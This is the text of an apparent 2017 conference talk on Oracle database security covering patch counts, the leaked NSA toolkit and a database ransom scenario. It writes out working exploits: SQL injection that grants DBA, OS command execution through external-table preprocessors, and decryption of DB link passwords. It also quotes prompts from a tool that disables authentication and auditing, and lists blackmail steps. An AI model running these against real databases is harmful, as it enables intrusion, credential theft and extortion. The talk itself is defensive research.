Best of Oracle Security 2017

What happened in 2017?

Agenda

! Intro ! January 2017 - October 2017 CPUs ! NSA & Database Hacking ! Outlook 2018 ! Q&A

Introduction

What will be shown in the next 45 minutes? ! Oracle Security Patches ! Krieg… ! Outlook 2018

Database Vulnerabilities and CPU

Again the patch situation is much better (down from 30 in 2016 to 14 in 2017)

Problem: At the moment only a few people are looking for security bugs in the database

Nowadays it’s rare that exploit code for databases is published

In 2017 prices for exploits went down

Exploit prices down in 2017

https://vuldb.com/?exploits

Exploit prices down in 2017

https://vuldb.com/?exploits.top

Jul 2017 CVE-2017-10202

https://vuldb.com/?id.103781

Current Price Estimation: $25k-$100k (0-day) / $5k-$25k (Today)

Oracle Vulnerabilities 2017

Oracle Vulnerabilities 2017

Number of vulnerabilities in Oracle database reduced again

! 14 findings in 2017 (2016:30 , 2015: 29, 2014: 43, 2013: 13 2012: 17)

! 4 remote exploitable bugs (2016: 8, 2015:3, 2014: 4, 2013: 7, 2012: 8 )

• January 2017 CPU (2 Vulnerabilities – 0 remote)

• April 2017 CPU (2 Vulnerabilities – 0 remote)

• July 2017 CPU (4 Vulnerabilities – 2 remote)

• October 2017 CPU (6 Vulnerabilities – 2 remote)

2017

Dec 2016

Oracle 12.1 Exploit

* https://mahmoudhatem.wordpress.com/2016/12/14/sql-injection-vulnerability-cdbview-package/

Oracle 12.1 Exploit I

SQL> conn doag2017/doag2017 Connect durchgeführt.

SQL> select granted_role from user_role_privs;

CONNECT EXECUTE_CATALOG_ROLE

SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to doag2017''; RETURN ''1'';END; SELECT f as x FROM dual)-- ‚);

Oracle 12.1 Exploit II

SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;

1

SQL> select granted_role from user_role_privs;

CONNECT DBA EXECUTE_CATALOG_ROLE

January 2017

Oracle CPU January 2017 *

* http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html

January 2017 CPU*

2 security fixes (No remote exploitable)

1 OJVM (CVSS 9.0)

1 RDBMS (CVSS 3.3)

* http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html

February 2017

nothing special happened

March 2017Blog Entry: „Create any directory“=DBA=SYSDBA ! Ouch*

Blog Entry: CREATE ANY DIRECTORY threats : PDBs and the PATH_PREFIX clause**

Reverse engineering DB Link password decryption in PL/SQL***

* https://mahmoudhatem.wordpress.com/2017/03/03/create-any-directorydbasysdba-ouch/ ** https://mahmoudhatem.wordpress.com/2017/03/07/create-any-directory-threats-pdbs-and-the-path_prefix-clause/#more-6017 *** https://mahmoudhatem.wordpress.com/2016/12/08/reverse-engineering-db-link-password-decryption-in-plsql/

Exploit - Create any directory I

declare v_file utl_file.file_type; begin v_file:=utl_file.fopen('TEMP_DIR','execute_me.sh','w'); utl_file.put_line(v_file,'export PATH=/usr/local/bin:/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin'); utl_file.put_line(v_file,'export ORACLE_HOME=/oracle11/product/11.2.0/dbhome_1'); utl_file.put_line(v_file,'export ORACLE_SID=testdb'); utl_file.put_line(v_file,'export PATH=$ORACLE_HOME/bin:$PATH'); utl_file.put_line(v_file,'ps -ef | grep pmon'); utl_file.fclose(v_file); end; /

Exploit - Create any directory IICREATE TABLE exec_command ( txt varchar2(4000) ) ORGANIZATION EXTERNAL ( TYPE ORACLE_LOADER DEFAULT DIRECTORY temp_dir ACCESS PARAMETERS ( RECORDS DELIMITED BY NEWLINE PREPROCESSOR exec_dir:'bash' FIELDS TERMINATED BY ',' MISSING FIELD VALUES ARE NULL ( txt ) ) LOCATION ('execute_me.sh') );

Exploit - Create any directory IIIselect * from exec_command;

Escape from PDB without PATH_PREFIX

Create any directory privilege can be used to escape from PDBs. Oracle 12.1 introduced a new parameter PATH_PREFIX to avoid this attack but it was not working in 12.1

** https://mahmoudhatem.wordpress.com/2017/03/07/create-any-directory-threats-pdbs-and-the-path_prefix-clause/#more-6017

PDB without PATH_PREFIX SQL> create pluggable database pdb_prefix admin user pdbprefix identified by test123 PATH_PREFIX='/oracle/path_prefix/';

Pluggable database created.

SQL> alter session set container=pdb_prefix;

Session altered.

SQL> create directory temp_dir as '/tmp';

ORA-65254: invalid path specified for the directory

SQL> declare v_file utl_file.file_type; begin. …. utl_file.fclose(v_file); end; /

PL/SQL procedure successfully completed.

ll / -rw------- 1 oracle oinstall 205 Mar 7 14:41 execute_me.sh

PDB with PATH_PREFIX SQL> create pluggable database pdb_prefix admin user pdbprefix identified by test123 PATH_PREFIX='/oracle/path_prefix/';

Pluggable database created.

SQL> alter session set container=pdb_prefix;

Session altered.

SQL> create directory temp_dir as '/tmp';

ORA-65254: invalid path specified for the directory

SQL> create directory temp_dir as 'tmp';

Directory created.

SQL> declare v_file utl_file.file_type; begin. …. utl_file.fclose(v_file); end; /

PL/SQL procedure successfully completed.

ll /oracle/path_prefix -rw------- 1 oracle oinstall 205 Mar 7 14:41 execute_me.sh

Short history of DB Link Passwords*

<=10.2 Select password from sys.link$;

<=11.2.0.3 select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) from sys.link$;

** https://blogs.loopback.org/2014/06/db-link-passworter-metadaten-in-11-2-0-4/

Database Link Passwords 11.2-12.2

SELECT VALUE$ FROM SYS.PROPS$ WHERE name = 'NO_USERID_VERIFIER_SALT';

readelf -s oracle |  grep ztcshpl_v6112105: 0000000010b9ee40 16384 OBJECT  LOCAL  DEFAULT   29 ztcshpl_v6

Run script db_link_password_decrypt.sql. **

exec db_link_password_decrypt('17B21F905CE739E2759E6FB99745650E','076C8B8463098676 E408141A154CF4C20AAF19A52CF7FEF3CD8A99830A82F9D8F129665C2F395DF4F30EBE1 5E48D78096E9BD8AC1012D24525982CE3C828BE298EA798D6FBD8A18379DEE803692B 773B86570AB2DA90EA121124D6D0F228818D18812B42C77AE6D0F4BF257627643EEC34F B9A6C2EF6185D7302EF30673A2F4C’);

* https://mahmoudhatem.wordpress.com/2016/12/08/reverse-engineering-db-link-password-decryption-in-plsql/** https://github.com/hatem-mahmoud/scripts/blob/master/db_link_password_decrypt.sql

Database Link Passwords 11.2-12.2

April 2017

Oracle CPU April 2017* PassFreely Attack Bypasses Oracle Database Authentication** Shadow Brokers released toolset from the Equation Group aka. NSA

* http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html** https://www.bankinfosecurity.com/passfreely-attack-bypasses-oracle-database-authentication-a-9868

April 2017 CPU*

2 security fixes (0 remote exploitable)

1 SQL*Plus (CVSS 7.2)

1 OJVM (CVSS 5.3)

* http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html

http://www.inside-it.ch/articles/48930

NSA Oracle Tool

Shadow Brokers & NSA

On April 8th, 2017 The Shadow Brokers published a password for an encrypted dump. This dump contains several tools and exploits from the NSA Some of these exploits were used in later attacks (e.g. WannaCry) worldwide. Some of these tools affect databases (Oracle, SQL Server, SQLLite) The collection can be analyzed at https://github.com/misterch0c/shadowbroker

https://www.mnemonic.no/no/nyheter/2017/advisory---data-leakage-of-multiple-0-days-and-tools/

Analysis

Some features of the NSA Toolkit

Oracle (Hacking) Plugins Disable Authentication using PASSFREELY (passwords are no longer checked)Support from Oracle 7.2.2.4.0 - latest version Disable Oracle Auditing to avoid traces Backdoor (?) - Oracle_Implant.dll Connection String Wizard Run a standard query Read the top 10 rows from every table Run a folder of queries Write Results to CSV Unicode support for foreign languages …

Already seen before at the DOAG conference

Disable Oracle Authentication (Best of Oracle Security 2011) Disable Oracle Auditing to avoid traces (Best of Oracle Security 2013) Backdoor (?) - Oracle_Implant.dll (Oracle Rootkits – eine neue Gefahr für Datenbanken?

Some Output from the NSA tools

User friendly

Xxx

Oracle can log in: 1) the Windows Application Event Logs 2) the listener.log file 3) its internal auditing mechanisms (including the Enterprise Manager console)

We're going to check the first two, but we can't run the detailed auditing check (#3) until you connect to the database.

Once this is finished, connect and run the Detailed Audit Check Query Plan!

Sound good?

Audit check complete, don't forget to run the Detailed Audit Check query plan after you connect!

If you'd like to disable auditing or enable PASSFREELY select one of the options below. Otherwise continue by pressing 0:

Run 'audit -disable all'

Run PASSFREELY (oracle -memcheck && oracle -open)

If you'd like to reenable auditing or remove PASSFREELY select one of the options below. Otherwise continue by pressing 0:

User friendly

XxxAny 'sys' logins will be logged even if using PASSFREELY! You'd better know what you're doing!

Are you sure you'd like to run 'audit -disable all'? (Make sure you don't have security auditing dorked!)

audit -disable all

DISABLING AUDITING FAILED!!! GO GET HELP!

User friendly

Xxx

Run the "oracle -memcheck" command to make sure that we can exploit this database.

Run the "oracle -crc" command to determine version

PROBLEM FOUND! There is an unknown version of Oracle running on the box!\n It could be that you just need an updated version of PASSFREELY. If not, you should grab the Oracle symbol file and executable that failed the CRC check above! OK, that wasn't it or at least I couldn't fix the problem. It could be that this is an unknown version of Oracle (verify that the CRC identified a version string) If the version isn't identified, then that is the problem, otherwise the problem is with PASSFREELY itself, so please contact the developer!

If the version is unknown, you should bring back the Oracle executable and the associated symbol file so that it can be incorporated it into this plugin.

User friendly

Xxx

You need to look over the file we just downloaded before proceeding! At a minimum you should review the section: Database Usage by User and Tablespace You should also check to see if there are Partitioned tables for any users of interest.

Do you want to survey the database users

Type of data sample 1 - Sample using Table Partitions 2 - Sample using Table Partitions without Row Counts 3 - Sample without using Table Partitions 4 - Sample without using Table Paritions and without Row Counts 5 - Just get Row Counts and Table Descriptions

Enter the number of the type of data sample you want

User friendly

Xxx

Do you have cracked passwords for a user of interest (OR for the SYS or SYSTEM user)? Do you want to perform database exports for any users? Are you wanting to include the Constraints and Indexes in the export file? (You probably only want this if exporting everything) What is the name of the user you want to export? Do you have the password for this user ($expuser)?

Done with database exports. Waiting for all files to complete downloading before continuing. Done. Do you want to delete the copy of $sidchoice\_Passwords_To_Crack.txt that is in the directory $tempDownloadDirPath?

Done with the Oracle survey ... that was easy!

Passfreely Supported versions! Oracle Database v 7.2.2.4.0 ! Oracle Database v 7.3.2.2.0 ! Oracle Database v 7.3.2.3.15 ! Oracle Database v 7.3.3.0.0 ! Oracle Database v 7.3.3.5.3 ! Oracle Database v 7.3.3.6.0 ! Oracle Database v 7.3.4.0.0 ! Oracle Database v 7.3.4.4.0 ! Oracle Database v 7.3.4.5.0 ! Oracle Database v 7.3.4.5.2 ! Oracle Database v 8.0.3.0.0 ! Oracle Database v 8.0.3.2.3 ! Oracle Database v 8.0.4.0.0 ! Oracle Database v 8.0.4.0.1 ! Oracle Database v 8.0.4.3.5 ! Oracle Database v 8.0.4.3.8 ! Oracle Database v 8.0.4.4.0 ! Oracle Database v 8.0.4.4.1 ! Oracle Database v 8.0.5.0.0 ! … ! Oracle Database v 11.1.0.7 ! Oracle Database v 11.1.0.7 Patch 1 ! Oracle Database v 11.1.0.7 Patch 10

! Oracle Database v 11.1.0.7 Patch 11 ! Oracle Database v 11.1.0.7 Patch 12 ! Oracle Database v 11.1.0.7 Patch 13 ! Oracle Database v 11.1.0.7 Patch 14 ! Oracle Database v 11.1.0.7 Patch 15 ! Oracle Database v 11.1.0.7 Patch 16 ! Oracle Database v 11.1.0.7 Patch 17 ! Oracle Database v 11.1.0.7 Patch 2 ! Oracle Database v 11.1.0.7 Patch 3 ! Oracle Database v 11.1.0.7 Patch 4 ! Oracle Database v 11.1.0.7 Patch 5 ! Oracle Database v 11.1.0.7 Patch 6 ! Oracle Database v 11.1.0.7 Patch 7 ! Oracle Database v 11.1.0.7 Patch 8 ! Oracle Database v 11.1.0.7 Patch 9 ! Oracle Database v 11.2.0.1 Base - 64-bit ! Oracle Database v 11.2.0.1 Patch 7 - 64-

bit ! Oracle Database v 11.2.0.2 Base - 64-bit

Countermeasures

Do not rely on standard auditing methods (e.g. Oracle Auditing) Certain Access Patterns (password hashes sys.user$) & certain tools (e.g. exp) without ticket should be logged and analyzed Minimize the number of services on your Oracle database server SYS/SYSTEM access of application data should be monitored

May 2017

Nothing special happened

June 2017

Nothing special happened

July 2017

Oracle CPU July 2017 *

* http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html

July 2017 CPU*

4 security fixes (2 remote exploitable)

1 OJVM (CVSS 9.9)

1 DBMS_LDAP (CVSS 6.8, remote)

1 RAC (CVSS 6.8, remote)

1 RDBMS Security (CVSS 1.9)

* http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html

Jul 2017 CVE-2014-3566

Problem: A security vulnerability affecting SSL v3.0 was recently publicly disclosed (Padding Oracle On Downgraded Legacy Encryption, or “Poodle”). This security vulnerability is the result of a design flaw in SSL v3.0. Note that this vulnerability does not affect TLS and is limited to SSL 3.0, which is widely considered as an obsolete protocol. This vulnerability has received the identifier CVE-2014-3566.

Reporter: Karthik Bhargavan and Gaetan Leurent

https://www.oracle.com/technetwork/topics/security/poodlecve-2014-3566-2339408.html

Jul 2017 CVE-2016-2183Problem: Karthik Bhargavan and Gaetan Leurent have unveiled a new attack on Triple-DES, SWEET32, Birthday attacks on 64-bit block ciphers in TLS and OpenVPN. It has been assigned CVE-2016-2183. Reporter: Karthik Bhargavan and Gaetan Leurent

https://www.openssl.org/blog/blog/2016/08/24/sweet32/

August 2017

Nothing special happened

September 2017! Hacker attack more than 27.000 mongodb

databases*

https://www.heise.de/security/meldung/Hacker-Angriffe-auf-MongoDB-treffen-fast-27-000-Datenbanken-3822955.html

September 2017! Hacker attack more than 27.000 mongodb

databases*

https://www.heise.de/security/meldung/Hacker-Angriffe-auf-MongoDB-treffen-fast-27-000-Datenbanken-3822955.html

Encrypting DatabasesEscalate Privileges to DBA Enable TDE with an alter system command Encrypt important data (e.g. from business transactions). Due to the fact that it’s transparent the application does not detect the change Close the wallet after 1 week via a database job and send an email to the CEO... Depending on the backup concept of the database, the important data is encrypted and only accessible if you can open the wallet. The wallet password is not known to the DBA, only known to the blackmailer

Attacking Databases with Oracle TDE

! Add description

1Red-Database-Security GmbH

Abusing TDE for Blackmailing

1. Hacker login into the database

2. Become DBA

3. Create a wallet

4. Encrypt tables

5. Inform customer after shutdown

Data is still there but encrypted. And the keys are in the wallet.

October 2017

Oracle CPU October 2017 *

* http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

October 2017 CPU*

6 security fixes (2 remote exploitable)

1 Core RDBMS (CVSS 8.8)

1 Spatial (Apache Groovy) (CVSS 8.3, remote)

1 Java VM (CVSS 8.2)

1 WLM (Apache Tomcat) (CVSS 8.1, remote)

1 XMLDB (CVSS 6.5)

1 RDBMS Security (CVSS 2.3)

* http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

Oct 2017 CVE-2017-10292Problem: Creating Users with GRANT command not audited by „AUDIT CREATE USER“ Reporter: David Litchfield

Exploit:

GRANT DBA TO OOPSIEDAISY IDENTIFIED BY PA55W0RD1

Oct 2017 CVE-2016-6814Problem: It was found that a flaw in apache groovy library allows remote code execution wherever deserialization occurs in the application. It is possible for an attacker to craft a special serialized object that will execute code directly when deserialized. All applications which rely on serialization and do not isolate the code which deserializes objects are subject to this vulnerability. Reporter: Sam Thomas

Oct 2017 CVE-2017-10190

https://vuldb.com/de/?id.108006

Oct 2017 CVE-2016-8735The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.

Reporter: Pierre Ernst

http://seclists.org/oss-sec/2016/q4/502http://blog.safebuff.com/2016/12/05/Apache-Tomcat-Remote-Code-Execution-CVE-2016-8735/

November 2017

DOAG 2017

Blog Entry „Injecting a Backdoor in an Oracle database“ *

* https://mahmoudhatem.wordpress.com/2017/11/17/injecting-a-backdoor-in-an-oracle-database/#more-8100 ** https://yurichev.com/writings/oracle.pdf

First rename the original function “snttread” to “Snttread” in the object file “sntt.o” and then inject a new wrapper function named “snttread” in the library “lib/libntcp12.a”  which will do all the amazing stuff if it detect the magic word in this case “/bin/sh”.

Connecting using netcat

Findings from Security Audits in 2017

Weak passwords Cleartext in audit logs Privilege Escalation via CREATE INDEX privilege (already shown 2016) Too many privileges …

Cleartext passwords in Oracle audit log

Sometimes the Oracle audit log contains cleartext passwords Review the content of the audit.log to identify and remove the passwords.

GDPR-DDOS(Potential) upcoming attack in 2018 Use social media (e.g. twitter) to organize a GDPR-DDOS by asking thousands of users to use their rights Art. 12 GDPR

What happens to your organization in 2018 if you get 10,000 GDPR Info request?

GDPR-Info WebsitesIt’s possible that new GDPR-Info websites will appear where customers can request all their information from the top-10,000 companies at once.

Could you image how much time it takes for companies to answer all these requests ?

Trends 2018

Migration to 12.2

GDPR / DSGVO. (May 2018)

More Data Discovery of personal data

More auditing projects

Integration Auditing with SIEM solutions

Q & A

Thank you Contact:

Red-Database-Security GmbH Eibenweg 42 D-63150 Heusenstamm Germany